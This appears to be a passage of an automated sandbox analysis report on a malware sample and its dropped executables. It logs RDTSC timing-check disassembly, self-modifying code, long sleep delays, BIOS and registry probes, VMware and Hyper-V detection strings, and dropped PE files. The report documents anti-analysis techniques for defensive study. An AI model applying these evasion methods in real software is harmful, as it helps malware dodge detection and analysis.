                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0295 second address: 4BC02DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29F0CD52A1h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F29F0CD52A3h 0x00000018 mov edi, esi 0x0000001a popad 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC041F second address: 4BC0477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29F0C52761h 0x00000009 adc si, D1C6h 0x0000000e jmp 00007F29F0C52761h 0x00000013 popfd 0x00000014 jmp 00007F29F0C52760h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d jmp 00007F29F0C52760h 0x00000022 test esi, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0477 second address: 4BC0494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0494 second address: 4BC04EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 jmp 00007F29F0C52763h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F2A638108BBh 0x00000014 jmp 00007F29F0C52766h 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 jmp 00007F29F0C52760h 0x00000025 je 00007F2A6381089Eh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC04EF second address: 4BC04F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC04F3 second address: 4BC0510 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0510 second address: 4BC0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F29F0CD52A3h 0x0000000b sbb ecx, 70E603DEh 0x00000011 jmp 00007F29F0CD52A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [esi+44h] 0x0000001d jmp 00007F29F0CD529Eh 0x00000022 or edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0566 second address: 4BC056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC056A second address: 4BC0587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0587 second address: 4BC05B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 jne 00007F2A63810834h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ch, 26h 0x00000022 popad 0x00000023 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC05B6 second address: 4BC0612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29F0CD52A0h 0x00000009 jmp 00007F29F0CD52A5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F29F0CD52A0h 0x00000015 or si, 3558h 0x0000001a jmp 00007F29F0CD529Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 test byte ptr [esi+48h], 00000001h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 6246h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0612 second address: 4BC0617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BC0617 second address: 4BC065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F2A63893312h 0x0000000f pushad 0x00000010 mov eax, 788285CDh 0x00000015 pushad 0x00000016 call 00007F29F0CD52A8h 0x0000001b pop esi 0x0000001c mov si, dx 0x0000001f popad 0x00000020 popad 0x00000021 test bl, 00000007h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push esi 0x00000028 pop ebx 0x00000029 mov ax, E3E1h 0x0000002d popad 0x0000002e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF002C second address: 4BF0087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F29F0C5275Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007F29F0C5275Dh 0x0000001a xor ax, 8026h 0x0000001f jmp 00007F29F0C52761h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29F0C5275Dh 0x0000002e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0087 second address: 4BF00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F29F0CD52A3h 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF00BB second address: 4BF00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 2904h 0x00000008 popad 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF00C4 second address: 4BF00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A9h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF00E1 second address: 4BF00FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F29F0C5275Fh 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF00FF second address: 4BF0121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD52A2h 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0121 second address: 4BF0125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0125 second address: 4BF012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF012B second address: 4BF013F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 mov eax, 4CF7E1AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF013F second address: 4BF0143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0143 second address: 4BF0147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4BF0147 second address: 4BF014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Tries to evade debugger and weak emulator (self modifying code)
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESpecial instruction interceptor: First address: 55DCA5 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESpecial instruction interceptor: First address: 382C34 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESpecial instruction interceptor: First address: 5C35D6 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 27DCA5 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: A2C34 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 2E35D6 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMemory allocated: 2480000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMemory allocated: 2540000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMemory allocated: 4540000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXECode function: 11_2_04C40DE6 rdtsc 11_2_04C40DE6
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 180000
                                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6128Jump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3460Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5054Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4778Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1093
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1138
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1056
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 552
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1091
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1124
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeWindow / User API: threadDelayed 420
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeWindow / User API: threadDelayed 417
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ADFoyxP[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exeJump to dropped file
                                    Source: C:\Users\user\Desktop\random.exeAPI coverage: 3.4 %
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 508Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\svchost.exe TID: 7200Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\svchost.exe TID: 7532Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7732Thread sleep count: 1093 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7732Thread sleep time: -2187093s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7736Thread sleep count: 1138 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7736Thread sleep time: -2277138s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7708Thread sleep count: 1056 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7708Thread sleep time: -2113056s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7556Thread sleep count: 552 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7556Thread sleep time: -16560000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7968Thread sleep time: -180000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7720Thread sleep count: 1091 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7720Thread sleep time: -2183091s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7724Thread sleep count: 1124 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7724Thread sleep time: -2249124s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe TID: 2840Thread sleep time: -150000s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0048DBBE
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0045C2A2 FindFirstFileExW,0_2_0045C2A2
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004968EE FindFirstFileW,FindClose,0_2_004968EE
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0049698F
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D076
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0048D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D3A9
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00499642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00499642
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049979D
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00499B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00499B2B
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00495C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00495C97
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 180000
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\789919\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\789919
                                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                                    Source: rapes.exe, rapes.exe, 0000000E.00000001.1255577601.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000E.00000002.3642183042.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000002.1699197808.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000001.1644798172.0000000000232000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000019.00000002.2294579206.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000001B.00000002.2895467212.0000000000233000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                    Source: Amcache.hve.54.drBinary or memory string: VMware
                                    Source: Amcache.hve.54.drBinary or memory string: VMware Virtual USB Mouse
                                    Source: Amcache.hve.54.drBinary or memory string: vmci.syshbin
                                    Source: Amcache.hve.54.drBinary or memory string: VMware, Inc.
                                    Source: powershell.exe, 00000008.00000002.1319444757.00000287A8EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\cal
                                    Source: Amcache.hve.54.drBinary or memory string: VMware20,1hbin@
                                    Source: Amcache.hve.54.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                    Source: Amcache.hve.54.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                    Source: Amcache.hve.54.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                    Source: powershell.exe, 00000005.00000002.1219648140.0000000007319000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: svchost.exe, 0000000A.00000002.2865245242.0000021259A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2864138394.000002125442B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000003.2603793681.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXw!
                                    Source: Amcache.hve.54.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                    Source: Amcache.hve.54.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                    Source: Amcache.hve.54.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                    Source: Amcache.hve.54.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                    Source: powershell.exe, 00000005.00000002.1219942069.0000000007390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: Amcache.hve.54.drBinary or memory string: vmci.sys
                                    Source: Amcache.hve.54.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                    Source: powershell.exe, 00000008.00000002.1319444757.00000287A8EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: Amcache.hve.54.drBinary or memory string: vmci.syshbin`
